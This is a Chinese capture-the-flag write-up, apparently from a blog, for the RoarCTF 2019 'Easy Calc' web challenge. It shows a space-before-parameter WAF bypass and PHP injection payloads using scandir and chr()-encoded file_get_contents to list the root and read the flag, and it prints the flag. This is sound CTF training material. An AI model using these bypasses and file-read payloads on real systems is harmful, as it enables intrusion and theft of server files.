BUU-WEB-[RoarCTF 2019]Easy Calc

[RoarCTF 2019]Easy Calc

查看源码,发现有一段提示。
在这里插入图片描述
注释里显示,开启了WAF(web应用防护系统),但是通过源码审计并不能看出来。由于源码是php代码,猜测WAF也是使用php语言。假如waf不允许num变量传递字母,可以在num前加个空格,这样waf就找不到num这个变量了,因为现在的变量叫“ num”(此处num前有空格),而不是“num”。但php在解析的时候,会先把空格给去掉,这样我们的代码还能正常运行,还上传了非法字符。
利用scandir()尝试扫描根目录。

? num=1;var_dump(scandir("/"))

但是似乎"/"被过滤了无法执行,于是尝试使用chr(47)绕过。

? num=1;var_dump(scandir(chr(47)))

在这里插入图片描述
成功找到flag文件。
开始利用file_get_contents()得到flag文件的内容。

calc.php? num=1;var_dump(file_get_contents(chr(47).chr(102).chr(49).chr(97).chr(103).chr(103)))

在这里插入图片描述

flag{3a850a29-b65d-44e4-906a-9a5dbca93a2f} 
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值